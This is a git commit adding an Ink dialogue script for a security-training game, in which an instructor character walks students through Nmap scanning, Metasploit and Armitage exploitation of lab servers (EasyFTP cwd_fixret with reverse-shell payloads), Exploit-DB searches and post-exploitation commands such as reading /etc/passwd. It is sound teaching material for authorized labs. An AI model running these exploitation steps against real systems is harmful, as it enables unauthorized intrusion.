cybersecurity/BreakEscape
1
0
Fork 0
mirror of https://github.com/cliffe/BreakEscape.git synced 2026-02-21 19:28:03 +00:00
Code Issues Packages Projects Releases Wiki Activity

feat: Add GBL exploitation techniques lab sheet

Browse Source
This commit is contained in:
Z. Cliffe Schreuders
2025-11-19 18:24:26 +00:00
parent 531a2499ae
commit ab96da0731
1 changed files with 893 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

893
story_design/ink/lab_sheets/exploitation.ink Normal file
View File

@@ -0,0 +1,893 @@
// From Scanning to Exploitation Lab Sheet
// Based on HacktivityLabSheets: introducing_attacks/6_exploitation.md
// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw, Thalita Vergilio
// License: CC BY-SA 4.0
// Global persistent state
VAR instructor_rapport = 0
VAR exploitation_mastery = 0
// External variables
EXTERNAL player_name
=== start ===
Exploitation Specialist: Welcome back, Agent {player_name}. I'm your instructor for Advanced Exploitation Techniques.
~ instructor_rapport = 0
~ exploitation_mastery = 0
Exploitation Specialist: This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation.
Exploitation Specialist: You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems.
Exploitation Specialist: We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process.
Exploitation Specialist: Remember: this knowledge is for authorized penetration testing and defensive security only.
~ exploitation_mastery += 10
-> exploitation_hub
=== exploitation_hub ===
Exploitation Specialist: What aspect of exploitation would you like to explore?
+ [Why combine scanning and exploitation?]
-> scanning_to_exploitation
+ [Scanning targets with Nmap]
-> nmap_scanning
+ [Metasploit database and scan import]
-> metasploit_database
+ [Running scans from within msfconsole]
-> msfconsole_scanning
+ [Searching for Metasploit exploits]
-> searching_exploits
+ [Launching Metasploit exploits]
-> launching_exploits
+ [Introduction to Armitage]
-> armitage_intro
+ [Using Armitage for automated hacking]
-> armitage_usage
+ [Vulnerability databases and research]
-> vulnerability_databases
+ [The Exploit Database and searchsploit]
-> exploit_db
+ [Show me the commands reference]
-> commands_reference
+ [Practical challenge tips]
-> challenge_tips
+ [I'm ready for the lab exercises]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> END
=== scanning_to_exploitation ===
Exploitation Specialist: After gathering information about a target through footprinting and scanning, you need to know what attacks will work.
~ instructor_rapport += 5
Exploitation Specialist: The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security?
Exploitation Specialist: Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information.
+ [What makes a target exploitable?]
Exploitation Specialist: A target is exploitable when it's running vulnerable software that you have an exploit for.
Exploitation Specialist: For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system.
Exploitation Specialist: The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack.
~ instructor_rapport += 5
+ [How do I know what attacks will work?]
Exploitation Specialist: This is where vulnerability databases and exploit frameworks like Metasploit come in.
Exploitation Specialist: After scanning reveals "Windows 2000 with EasyFTP 1.7.0.11," you can search for known vulnerabilities in those specific versions.
Exploitation Specialist: Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number.
Exploitation Specialist: We'll also look at external databases like CVE Details, NVD, and Exploit DB.
~ instructor_rapport += 5
- -> exploitation_hub
=== nmap_scanning ===
Exploitation Specialist: The first step is thorough scanning to identify your targets and what they're running.
~ instructor_rapport += 5
Exploitation Specialist: For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows.
Exploitation Specialist: A comprehensive scan would be: nmap -sV 10.X.X.2-3
Exploitation Specialist: Where X.X are the second and third octets of your Kali VM's IP address.
+ [What should I look for in the scan results?]
Exploitation Specialist: Pay attention to several key pieces of information:
Exploitation Specialist: First, the IP addresses - which host is Linux and which is Windows?
Exploitation Specialist: Second, what services are running - HTTP, FTP, SSH, IRC?
Exploitation Specialist: Third, and most importantly, what specific software versions are running. For example: "vsftpd 2.3.4" or "EasyFTP 1.7.0.11"
Exploitation Specialist: Those specific version numbers are critical for finding applicable exploits.
~ instructor_rapport += 5
+ [What if the scan takes too long?]
Exploitation Specialist: Windows scans can take several minutes to complete - this is normal.
Exploitation Specialist: If you want faster results, you can skip OS detection or scan fewer ports.
Exploitation Specialist: However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port.
~ instructor_rapport += 5
+ [What if nmap shows ftp with a question mark?]
Exploitation Specialist: If you see "ftp?" in the results, it means Nmap isn't confident about the service identification.
Exploitation Specialist: This can happen if the service is slow to respond or behaving unusually.
Exploitation Specialist: Try restarting the Windows server and scanning again. The service should respond properly after a fresh start.
~ instructor_rapport += 5
- -> exploitation_hub
=== metasploit_database ===
Exploitation Specialist: Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities.
~ instructor_rapport += 5
Exploitation Specialist: This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services.
Exploitation Specialist: Before using the database, you need to initialize it and start PostgreSQL.
+ [How do I initialize the Metasploit database?]
Exploitation Specialist: First, reinitialize the database: sudo msfdb reinit
Exploitation Specialist: Then start PostgreSQL: sudo service postgresql start
Exploitation Specialist: These commands set up the database that Metasploit will use to store scan results and track compromised hosts.
Exploitation Specialist: You only need to do this once per session, or after restarting your Kali VM.
~ instructor_rapport += 5
+ [How do I import Nmap scan results?]
Exploitation Specialist: If you've saved Nmap results in XML format, you can import them:
Exploitation Specialist: From msfconsole, run: db_import scan_output.xml
Exploitation Specialist: Metasploit will parse the XML and populate the database with host and service information.
Exploitation Specialist: You can then query this data with commands like "hosts" and "services"
~ instructor_rapport += 5
+ [What can I do with the database?]
Exploitation Specialist: Once data is in the database, you can query it intelligently:
Exploitation Specialist: "hosts" shows all discovered hosts and their operating systems.
Exploitation Specialist: "services" shows all discovered services across all hosts.
Exploitation Specialist: "services -p 21" shows only services on port 21 (FTP).
Exploitation Specialist: "services -p 21 -R" does the same AND automatically sets RHOSTS to target those services!
Exploitation Specialist: This integration makes targeting much more efficient.
~ instructor_rapport += 5
- -> exploitation_hub
=== msfconsole_scanning ===
Exploitation Specialist: You can run scans directly from within msfconsole - you don't always need a separate terminal.
~ instructor_rapport += 5
Exploitation Specialist: Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET
Exploitation Specialist: Even better, you can use db_nmap which scans AND automatically imports results into the database.
+ [What's the difference between nmap and db_nmap?]
Exploitation Specialist: When you run "nmap" from msfconsole, it just executes Nmap normally. You'd need to manually import the results.
Exploitation Specialist: When you run "db_nmap", it does the same scan BUT automatically imports results into the Metasploit database.
Exploitation Specialist: For example: msf > db_nmap -O -sV -p 1-65535 TARGET
Exploitation Specialist: This scans all ports with OS and version detection, and the results are immediately available via "hosts" and "services"
~ instructor_rapport += 5
+ [Does Metasploit have its own scanners?]
Exploitation Specialist: Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap.
Exploitation Specialist: You can see them with: use auxiliary/scanner/portscan/ (then press TAB)
Exploitation Specialist: For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp
Exploitation Specialist: These modules integrate directly with the database and can use multiple threads for faster scanning.
~ instructor_rapport += 5
+ [How do I use Metasploit's port scanner?]
Exploitation Specialist: First, select the module: use auxiliary/scanner/portscan/tcp
Exploitation Specialist: Set the target: set RHOSTS TARGET_IP
Exploitation Specialist: Optionally speed it up: set THREADS 10
Exploitation Specialist: Then run it: run
Exploitation Specialist: Results are automatically stored in the database. You can verify with the "services" command.
~ instructor_rapport += 5
- -> exploitation_hub
=== searching_exploits ===
Exploitation Specialist: Metasploit's search command is incredibly powerful for finding relevant exploits.
~ instructor_rapport += 5
Exploitation Specialist: You can search by platform, service name, CVE number, exploit type, and more.
Exploitation Specialist: The basic syntax is: search <keyword>
Exploitation Specialist: But you can be much more specific with search operators.
+ [What search operators are available?]
Exploitation Specialist: Here are the main search operators:
Exploitation Specialist: type: - Specify module type (exploit, auxiliary, post)
Exploitation Specialist: platform: - Specify platform (Windows, Linux, etc.)
Exploitation Specialist: cve: - Search by CVE number
Exploitation Specialist: name: - Search module names
Exploitation Specialist: For example: search type:exploit platform:Windows
Exploitation Specialist: Or: search type:exploit cve:2003-0352
~ instructor_rapport += 5
+ [How do I search for specific software?]
Exploitation Specialist: Simply include the software name in the search:
Exploitation Specialist: search easyftp
Exploitation Specialist: search vsftpd
Exploitation Specialist: search unreal
Exploitation Specialist: Metasploit will search module names, descriptions, and references for matches.
Exploitation Specialist: Look through the results for modules that match your target's version number.
~ instructor_rapport += 5
+ [Give me some search examples]
Exploitation Specialist: Sure! Here are useful searches:
Exploitation Specialist: search type:exploit platform:linux
Exploitation Specialist: search type:exploit cve:2018
Exploitation Specialist: search buffer overflow
Exploitation Specialist: search type:exploit platform:Windows XP
Exploitation Specialist: search IRC (to find IRC server exploits)
Exploitation Specialist: Once you find a promising module, use "info exploit/path/to/module" to learn more about it.
~ instructor_rapport += 5
- -> exploitation_hub
=== launching_exploits ===
Exploitation Specialist: Once you've identified the right exploit module, launching it follows a standard workflow.
~ instructor_rapport += 5
Exploitation Specialist: The process is: select the module, configure options, choose a payload, and launch the attack.
Exploitation Specialist: Let's walk through a typical exploitation scenario.
+ [Walk me through exploiting EasyFTP]
Exploitation Specialist: Let me guide you through the complete process:
Exploitation Specialist: First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret
Exploitation Specialist: Check required options: show options
Exploitation Specialist: Set the target: set RHOST TARGET_IP
Exploitation Specialist: Choose a payload: set PAYLOAD windows/shell/reverse_tcp
Exploitation Specialist: Set your IP for the reverse shell: set LHOST YOUR_KALI_IP
Exploitation Specialist: Optionally check if it's vulnerable: check (though most don't support this)
Exploitation Specialist: Launch the attack: exploit
Exploitation Specialist: If successful, you'll get a shell on the target!
~ instructor_rapport += 5
+ [What payloads should I use?]
Exploitation Specialist: The payload depends on what you want to achieve and what the exploit supports.
Exploitation Specialist: You can see compatible payloads with: show payloads
Exploitation Specialist: For Windows targets, common choices include:
Exploitation Specialist: windows/shell/reverse_tcp - Basic command shell
Exploitation Specialist: windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features
Exploitation Specialist: For Linux targets:
Exploitation Specialist: cmd/unix/reverse - Simple Unix shell
Exploitation Specialist: linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux
~ instructor_rapport += 5
+ [What if the exploit doesn't work?]
Exploitation Specialist: First, run "show options" and verify all settings, especially IP addresses.
Exploitation Specialist: Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST.
Exploitation Specialist: Try restarting the target VM - sometimes services crash after failed exploit attempts.
Exploitation Specialist: Verify the target is actually running the vulnerable software at that version.
Exploitation Specialist: Some exploits are unreliable and may need multiple attempts.
~ instructor_rapport += 5
+ [What can I do once I have a shell?]
Exploitation Specialist: With a Windows shell, you can run commands like:
Exploitation Specialist: dir C:\ (list files)
Exploitation Specialist: net user (list user accounts)
Exploitation Specialist: whoami (check your privileges)
Exploitation Specialist: For Linux shells:
Exploitation Specialist: ls -la (list files)
Exploitation Specialist: cat /etc/passwd (view user accounts)
Exploitation Specialist: whoami (check current user)
Exploitation Specialist: We'll cover post-exploitation in more depth in later labs.
~ instructor_rapport += 5
- -> exploitation_hub
=== armitage_intro ===
Exploitation Specialist: Armitage is a free and open source graphical interface for Metasploit with powerful automation features.
~ instructor_rapport += 5
Exploitation Specialist: It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing.
Exploitation Specialist: Armitage can scan networks, automatically suggest attacks, and visualize compromised systems.
+ [How is Armitage different from msfconsole?]
Exploitation Specialist: Msfconsole is a command-line interface that gives you complete control and flexibility.
Exploitation Specialist: Armitage provides a graphical interface that visualizes the network and automates finding attacks.
Exploitation Specialist: Armitage can look at scan results and automatically suggest which exploits might work against each target.
Exploitation Specialist: It's particularly useful for beginners or when you want to quickly test multiple targets.
Exploitation Specialist: However, experienced penetration testers often prefer msfconsole for its power and speed.
~ instructor_rapport += 5
+ [How do I start Armitage?]
Exploitation Specialist: First, initialize the Metasploit database if you haven't already:
Exploitation Specialist: sudo msfdb reinit
Exploitation Specialist: sudo service postgresql start
Exploitation Specialist: Then start Armitage: armitage &
Exploitation Specialist: The & runs it in the background so you can continue using your terminal.
Exploitation Specialist: Leave the connection options as default and click "Connect"
Exploitation Specialist: If prompted, allow Armitage to start the Metasploit RPC server.
~ instructor_rapport += 5
+ [What does the Armitage interface show?]
Exploitation Specialist: Armitage displays a visual network map showing discovered hosts.
Exploitation Specialist: Each host is represented by an icon - the icon shows the detected operating system.
Exploitation Specialist: Compromised systems are shown in red with lightning bolts.
Exploitation Specialist: You can right-click hosts to see suggested attacks, launch exploits, or interact with shells.
Exploitation Specialist: The interface makes it easy to see the big picture of a network and what you've compromised.
~ instructor_rapport += 5
- -> exploitation_hub
=== armitage_usage ===
Exploitation Specialist: Let me walk you through using Armitage to scan and exploit targets.
~ instructor_rapport += 5
Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow.
+ [How do I scan with Armitage?]
Exploitation Specialist: Click the "Hosts" menu, select "Nmap Scan", then choose a scan type.
Exploitation Specialist: "Quick Scan (OS detect)" is a good starting point: nmap -O -sV TARGET
Exploitation Specialist: Enter the IP address to scan and Armitage will run Nmap.
Exploitation Specialist: Results are automatically imported into the Metasploit database and displayed visually.
Exploitation Specialist: Any previously scanned hosts in the database will also appear automatically.
~ instructor_rapport += 5
+ [How does Armitage suggest attacks?]
Exploitation Specialist: Armitage analyzes the operating system and services detected on each host.
Exploitation Specialist: First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor
Exploitation Specialist: Then click: Attacks → Find attacks
Exploitation Specialist: Armitage will match detected services to available exploits in Metasploit.
Exploitation Specialist: Right-click a host and select "Attack" to see suggested exploits categorized by service.
~ instructor_rapport += 5
+ [How do I launch an attack in Armitage?]
Exploitation Specialist: Right-click the target host and select "Attack"
Exploitation Specialist: Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret
Exploitation Specialist: Click "Launch" and Armitage will configure and run the exploit.
Exploitation Specialist: If successful, the host icon turns red showing it's compromised!
Exploitation Specialist: You can then right-click the compromised host to interact with shells or run post-exploitation modules.
~ instructor_rapport += 5
+ [How do I interact with a compromised system?]
Exploitation Specialist: Right-click the compromised (red) host.
Exploitation Specialist: Look for "Meterpreter 1" or "Shell 1" depending on the payload used.
Exploitation Specialist: Click "Interact" → "Command shell" to open a terminal.
Exploitation Specialist: You can now run commands like "dir" on Windows or "ls" on Linux.
Exploitation Specialist: Armitage also has menu options for common post-exploitation tasks.
~ instructor_rapport += 5
- -> exploitation_hub
=== vulnerability_databases ===
Exploitation Specialist: Beyond Metasploit, there are numerous online vulnerability databases you should know about.
~ instructor_rapport += 5
Exploitation Specialist: These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available.
Exploitation Specialist: Different databases have different focuses and information, so it's worth checking multiple sources.
+ [What are the main vulnerability databases?]
Exploitation Specialist: Here are the most important ones:
Exploitation Specialist: CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations.
Exploitation Specialist: NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository.
Exploitation Specialist: SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums.
Exploitation Specialist: Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories.
~ instructor_rapport += 5
+ [What information do these databases provide?]
Exploitation Specialist: Vulnerability databases typically include:
Exploitation Specialist: CVE numbers - unique identifiers for each vulnerability.
Exploitation Specialist: Severity scores (CVSS) - numerical ratings of how serious the vulnerability is.
Exploitation Specialist: Affected versions - which specific software versions are vulnerable.
Exploitation Specialist: Technical descriptions of the vulnerability.
Exploitation Specialist: References to patches, advisories, and sometimes proof-of-concept code.
Exploitation Specialist: Information about whether exploits exist in the wild.
~ instructor_rapport += 5
+ [Do all vulnerabilities have CVEs?]
Exploitation Specialist: No! This is an important point.
Exploitation Specialist: CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs.
Exploitation Specialist: Sometimes researchers publish vulnerabilities before CVEs are assigned.
Exploitation Specialist: Some vendors have their own vulnerability identifiers.
Exploitation Specialist: Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet.
Exploitation Specialist: This is why checking multiple sources and forums is important.
~ instructor_rapport += 5
- -> exploitation_hub
=== exploit_db ===
Exploitation Specialist: The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits.
~ instructor_rapport += 5
Exploitation Specialist: It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code.
Exploitation Specialist: Kali Linux includes a local copy of the entire database!
+ [How do I search Exploit-DB online?]
Exploitation Specialist: Visit exploit-db.com and use their search function.
Exploitation Specialist: You can search by software name, version, platform, or exploit type.
Exploitation Specialist: Each exploit listing includes the source code, often in Python, C, PHP, or other languages.
Exploitation Specialist: The database also categorizes exploits by type: remote, local, web application, DoS, etc.
~ instructor_rapport += 5
+ [How do I use the local Exploit-DB copy?]
Exploitation Specialist: On Kali Linux, exploits are stored in /usr/share/exploitdb/
Exploitation Specialist: They're organized by platform: windows, linux, osx, etc.
Exploitation Specialist: You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows | less
Exploitation Specialist: There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv
~ instructor_rapport += 5
+ [What's searchsploit?]
Exploitation Specialist: Searchsploit is a command-line tool for searching the local Exploit-DB copy.
Exploitation Specialist: It's much faster and more convenient than manually searching files.
Exploitation Specialist: Basic usage: searchsploit easyftp
Exploitation Specialist: You can also use grep on the CSV file: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv
Exploitation Specialist: To download an exploit to your current directory: searchsploit -m windows/remote/11539.py
~ instructor_rapport += 5
+ [How do I use standalone exploits from Exploit-DB?]
Exploitation Specialist: Standalone exploits often require some manual setup:
Exploitation Specialist: You might need to edit the source code to set the target IP address.
Exploitation Specialist: Some exploits require compilation (C/C++ code).
Exploitation Specialist: Python exploits might need specific library dependencies.
Exploitation Specialist: Read the exploit code comments carefully - they usually explain how to use it.
Exploitation Specialist: Always understand what an exploit does before running it!
~ instructor_rapport += 5
- -> exploitation_hub
=== commands_reference ===
Exploitation Specialist: Let me provide a comprehensive commands reference for this lab.
~ instructor_rapport += 5
Exploitation Specialist: **Initial Scanning:**
Exploitation Specialist: nmap -sV 10.X.X.2-3 (scan for two servers)
Exploitation Specialist: nmap -O -sV -p 1-65535 TARGET (comprehensive scan)
Exploitation Specialist: **Metasploit Database Setup:**
Exploitation Specialist: sudo msfdb reinit
Exploitation Specialist: sudo service postgresql start
Exploitation Specialist: msfconsole (start Metasploit console)
+ [Show me scanning from msfconsole]
Exploitation Specialist: **Scanning from Msfconsole:**
Exploitation Specialist: msf > nmap -O -sV TARGET
Exploitation Specialist: msf > db_nmap -O -sV -p 1-65535 TARGET
Exploitation Specialist: msf > db_import scan_output.xml
Exploitation Specialist: **Database Queries:**
Exploitation Specialist: msf > hosts (show all hosts)
Exploitation Specialist: msf > services (show all services)
Exploitation Specialist: msf > services -p 21 (show services on port 21)
Exploitation Specialist: msf > services -p 21 -R (and set RHOSTS)
~ instructor_rapport += 3
+ [Show me Metasploit scanning modules]
Exploitation Specialist: **Metasploit Port Scanners:**
Exploitation Specialist: msf > use auxiliary/scanner/portscan/ (TAB to see options)
Exploitation Specialist: msf > use auxiliary/scanner/portscan/tcp
Exploitation Specialist: msf auxiliary(tcp) > set RHOSTS TARGET
Exploitation Specialist: msf auxiliary(tcp) > set THREADS 10
Exploitation Specialist: msf auxiliary(tcp) > run
Exploitation Specialist: msf auxiliary(tcp) > services
Exploitation Specialist: msf auxiliary(tcp) > back
~ instructor_rapport += 3
+ [Show me searching for exploits]
Exploitation Specialist: **Searching for Exploits:**
Exploitation Specialist: msf > help search
Exploitation Specialist: msf > search easyftp
Exploitation Specialist: msf > search type:exploit platform:Windows
Exploitation Specialist: msf > search type:exploit cve:2003-0352
Exploitation Specialist: msf > search buffer overflow
Exploitation Specialist: msf > search type:exploit platform:linux
Exploitation Specialist: msf > info exploit/windows/ftp/easyftp_cwd_fixret
~ instructor_rapport += 3
+ [Show me launching exploits]
Exploitation Specialist: **Launching Exploits:**
Exploitation Specialist: msf > use exploit/windows/ftp/easyftp_cwd_fixret
Exploitation Specialist: msf exploit(...) > show options
Exploitation Specialist: msf exploit(...) > set RHOST TARGET_IP
Exploitation Specialist: msf exploit(...) > show payloads
Exploitation Specialist: msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp
Exploitation Specialist: msf exploit(...) > set LHOST YOUR_KALI_IP
Exploitation Specialist: msf exploit(...) > check (if supported)
Exploitation Specialist: msf exploit(...) > exploit
~ instructor_rapport += 3
+ [Show me post-exploitation commands]
Exploitation Specialist: **Post-Exploitation Commands (Windows):**
Exploitation Specialist: dir C:\ (list files)
Exploitation Specialist: net user (list user accounts)
Exploitation Specialist: whoami (check privileges)
Exploitation Specialist: type C:\path\to\flag.txt (read file)
Exploitation Specialist: **Post-Exploitation Commands (Linux):**
Exploitation Specialist: ls -la (list files)
Exploitation Specialist: cat /etc/passwd (view user accounts)
Exploitation Specialist: whoami (current user)
Exploitation Specialist: cat flag (read flag file)
~ instructor_rapport += 3
+ [Show me Armitage commands]
Exploitation Specialist: **Armitage Setup:**
Exploitation Specialist: sudo msfdb reinit
Exploitation Specialist: sudo service postgresql start
Exploitation Specialist: armitage &
Exploitation Specialist: **Armitage Workflow:**
Exploitation Specialist: 1. Hosts → Nmap Scan → Quick Scan (OS detect)
Exploitation Specialist: 2. Armitage → Set Exploit Rank → Poor
Exploitation Specialist: 3. Attacks → Find attacks
Exploitation Specialist: 4. Right-click host → Attack → select exploit → Launch
Exploitation Specialist: 5. Right-click compromised host → Interact → Command shell
~ instructor_rapport += 3
+ [Show me Exploit-DB commands]
Exploitation Specialist: **Exploit Database:**
Exploitation Specialist: find /usr/share/exploitdb/exploits/windows | less
Exploitation Specialist: less /usr/share/exploitdb/files_exploits.csv
Exploitation Specialist: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv
Exploitation Specialist: searchsploit easyftp
Exploitation Specialist: searchsploit -m windows/remote/11539.py
~ instructor_rapport += 3
- -> exploitation_hub
=== challenge_tips ===
Exploitation Specialist: Let me give you practical tips for succeeding in the exploitation challenges.
~ instructor_rapport += 5
Exploitation Specialist: **Finding Vulnerable Services:**
Exploitation Specialist: Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET
Exploitation Specialist: Pay close attention to service versions - specific version numbers are key to finding exploits.
Exploitation Specialist: Import results into Metasploit for easier targeting: db_nmap -sV TARGET
+ [Tips for exploiting the Windows server?]
Exploitation Specialist: The Windows server is running EasyFTP with a known vulnerability.
Exploitation Specialist: Search for it: search easyftp
Exploitation Specialist: Look for the module ending in "cwd_fixret"
Exploitation Specialist: Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp
Exploitation Specialist: Make sure to set LHOST to YOUR Kali IP (the host-only network address).
Exploitation Specialist: If the exploit fails, restart the Windows VM and try again.
~ instructor_rapport += 5
+ [Tips for exploiting the Linux server?]
Exploitation Specialist: The Linux server has multiple potentially vulnerable services.
Exploitation Specialist: Scan all ports to find everything running: nmap -sV -p- TARGET
Exploitation Specialist: Look for services like vsftpd, IRC, or other network services.
Exploitation Specialist: Search Metasploit for exploits matching those services.
Exploitation Specialist: Remember to use a Unix reverse shell payload: cmd/unix/reverse
Exploitation Specialist: Some Linux exploits are more reliable than others - you may need to try a few.
~ instructor_rapport += 5
+ [Tips for using Armitage?]
Exploitation Specialist: Armitage is great for beginners because it suggests attacks automatically.
Exploitation Specialist: Make sure you set the exploit rank to "Poor" or you'll miss some exploits.
Exploitation Specialist: Don't just click the first suggested attack - read the module info to understand what it does.
Exploitation Specialist: Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1.
Exploitation Specialist: If Armitage seems to hang, check the console tab at the bottom for error messages.
~ instructor_rapport += 5
+ [General troubleshooting advice?]
Exploitation Specialist: Always verify your IP addresses with "show options" before running exploits.
Exploitation Specialist: RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP.
Exploitation Specialist: If services stop responding, restart the target VM - exploits often crash vulnerable services.
Exploitation Specialist: After successfully exploiting a service once, you'll need to restart the VM to exploit it again.
Exploitation Specialist: Be patient - some exploits take time to establish connections.
~ instructor_rapport += 5
+ [Where are the flags?]
Exploitation Specialist: For the Windows server, look on a user's Desktop.
Exploitation Specialist: Navigate with: cd C:\Users or cd C:\Documents and Settings
Exploitation Specialist: List directories with: dir
Exploitation Specialist: Read flag files with: type flag.txt
Exploitation Specialist: For the Linux server, flags are typically in user home directories.
Exploitation Specialist: Navigate with: cd /home
Exploitation Specialist: List directories with: ls -la
Exploitation Specialist: Read flags with: cat flag
~ instructor_rapport += 5
- -> exploitation_hub
=== ready_for_practice ===
Exploitation Specialist: Excellent! You're ready to start practical exploitation.
~ instructor_rapport += 10
~ exploitation_mastery += 10
Exploitation Specialist: You now understand how to move from scanning to exploitation - the core of penetration testing.
Exploitation Specialist: Remember: these techniques are powerful. Use them only for authorized security testing and defensive purposes.
Exploitation Specialist: In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access.
+ [Any final advice before I start?]
Exploitation Specialist: Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit.
Exploitation Specialist: Don't rush. Take time to understand what each exploit does and why it works.
Exploitation Specialist: If something doesn't work, check your settings, restart the target, and try again.
Exploitation Specialist: Try both msfconsole and Armitage to see which you prefer.
Exploitation Specialist: Most importantly: always verify you're targeting the right system and have authorization!
Exploitation Specialist: Good luck, Agent {player_name}. Time to put your skills to the test.
~ instructor_rapport += 10
- -> exploitation_hub
-> END